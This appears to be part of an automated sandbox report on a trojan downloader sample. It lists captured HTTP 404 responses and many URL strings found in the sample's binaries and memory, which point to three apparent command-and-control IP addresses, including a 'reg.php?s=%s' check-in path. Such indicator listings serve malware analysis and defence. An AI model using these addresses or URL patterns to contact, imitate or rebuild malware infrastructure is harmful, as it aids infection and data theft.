                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:54 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:57 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: winploravr.exe, winploravr.exe, 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 0000000E.00000000.1906559266.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 00000011.00000002.2008324273.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, winploravr.exe, 00000011.00000000.1987852595.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, winploravr.exe.7.dr, sysbrapsvc.exe.0.dr, winploravr.exe0.7.dr, 3193211493.exe.2.dr, 1146722911.exe.2.drString found in binary or memory: http://185.215.113.66/
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000002.1835372056.000000000099E000.00000004.00000020.00020000.00000000.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.drString found in binary or memory: http://185.215.113.66/1
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1A
                            Source: 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.drString found in binary or memory: http://185.215.113.66/1http://185.215.113.66/2http://185.215.113.66/3http://185.215.113.66/4http://1
                            Source: 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.drString found in binary or memory: http://185.215.113.66/2
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2.233.141/
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2H
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2O
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.drString found in binary or memory: http://185.215.113.66/3
                            Source: 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3:(
                            Source: sysbrapsvc.exe, 00000002.00000003.1794514607.0000000000692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3KKC:
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3T
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3860975696.0000000000692000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.drString found in binary or memory: http://185.215.113.66/4
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3860975696.0000000000692000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.drString found in binary or memory: http://185.215.113.66/5
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5C:
                            Source: 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5P
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.drString found in binary or memory: http://185.215.113.66/6
                            Source: 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/61(
                            Source: 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.drString found in binary or memory: http://185.215.113.66/_1
                            Source: 1146722911.exe, 00000007.00000002.3857092737.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_1/
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_1Ih
                            Source: 1146722911.exe, 00000007.00000002.3857092737.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_1_
                            Source: 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.drString found in binary or memory: http://185.215.113.66/_2
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_2.233.141/_2
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_2Ah
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_2Yk
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_2ah(d-
                            Source: 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_2d
                            Source: 1146722911.exe, 00000007.00000003.1910029752.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3854688865.000000000073A000.00000004.00000010.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000003.2077440779.0000000000948000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 2303012543.exe, 00000008.00000002.1835372056.00000000009CB000.00000004.00000020.00020000.00000000.sdmp, 2303012543.exe, 00000008.00000002.1835645127.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2303012543.exe, 00000008.00000000.1812033421.0000000000B52000.00000002.00000001.01000000.00000009.sdmp, 2711236308.exe, 2711236308.exe, 0000000D.00000000.1899350021.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 2711236308.exe, 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp, 1245832676.exe, 1245832676.exe, 00000010.00000002.2002860565.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 1245832676.exe, 00000010.00000000.1982341413.0000000000AE2000.00000002.00000001.01000000.0000000F.sdmp, 2711236308.exe.7.dr, 2303012543.exe.7.dr, 1245832676.exe.7.drString found in binary or memory: http://185.215.113.66/_3
                            Source: 1146722911.exe, 00000007.00000002.3854688865.000000000073A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_32_p0
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_36
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_36U
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_36o
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_377p
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_3Yh
                            Source: 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_3mily
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_3qh
                            Source: 2303012543.exe, 00000008.00000002.1835372056.00000000009A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/_3t
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/der
                            Source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, sysbrapsvc.exe.0.dr, 3193211493.exe.2.drString found in binary or memory: http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%user
                            Source: sysbrapsvc.exe, 00000002.00000003.1665949097.0000000004781000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000000.1686101953.0000000000DB3000.00000002.00000001.01000000.00000008.sdmp, 1146722911.exe, 00000007.00000002.3860898504.0000000000DB3000.00000002.00000001.01000000.00000008.sdmp, winploravr.exe, 00000009.00000000.1825407566.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, winploravr.exe, 00000009.00000002.1846619040.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, winploravr.exe, 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 0000000E.00000000.1906559266.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 00000011.00000002.2008324273.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, winploravr.exe, 00000011.00000000.1987852595.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, winploravr.exe.7.dr, winploravr.exe0.7.dr, 1146722911.exe.2.drString found in binary or memory: http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/_1_2_3%s:Zone.Identifier%windir%%
                            Source: sysbrapsvc.exe, 00000002.00000002.3863143068.0000000002263000.00000004.00000020.00020000.00000000.sdmp, 300129380.exe, 00000012.00000000.2034540259.00000000003F2000.00000002.00000001.01000000.00000010.sdmp, 300129380.exe, 00000012.00000002.2075465997.00000000003F2000.00000002.00000001.01000000.00000010.sdmp, 300129380.exe.2.drString found in binary or memory: http://185.215.113.66/reg.php?s=%s
                            Source: sysbrapsvc.exe, 00000002.00000002.3863143068.0000000002263000.00000004.00000020.00020000.00000000.sdmp, 300129380.exe, 00000012.00000000.2034540259.00000000003F2000.00000002.00000001.01000000.00000010.sdmp, 300129380.exe, 00000012.00000002.2075465997.00000000003F2000.00000002.00000001.01000000.00000010.sdmp, 300129380.exe.2.drString found in binary or memory: http://185.215.113.66/reg.php?s=%sMozilla/5.0
                            Source: winploravr.exe, winploravr.exe, 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 0000000E.00000000.1906559266.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp, winploravr.exe, 00000011.00000002.2008324273.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, winploravr.exe, 00000011.00000000.1987852595.00000000002A3000.00000002.00000001.01000000.0000000A.sdmp, SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, winploravr.exe.7.dr, sysbrapsvc.exe.0.dr, winploravr.exe0.7.dr, 3193211493.exe.2.dr, 1146722911.exe.2.drString found in binary or memory: http://193.233.132.177/
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/1
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/2
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/2S
                            Source: sysbrapsvc.exe, 00000002.00000002.3863535540.00000000024DB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/3
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/31A
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/377
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/3C
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/3graphy
                            Source: sysbrapsvc.exe, 00000002.00000002.3861073060.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/3h.dll
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/3s
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/4
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/4#
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/5
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/6
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000925000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/_1
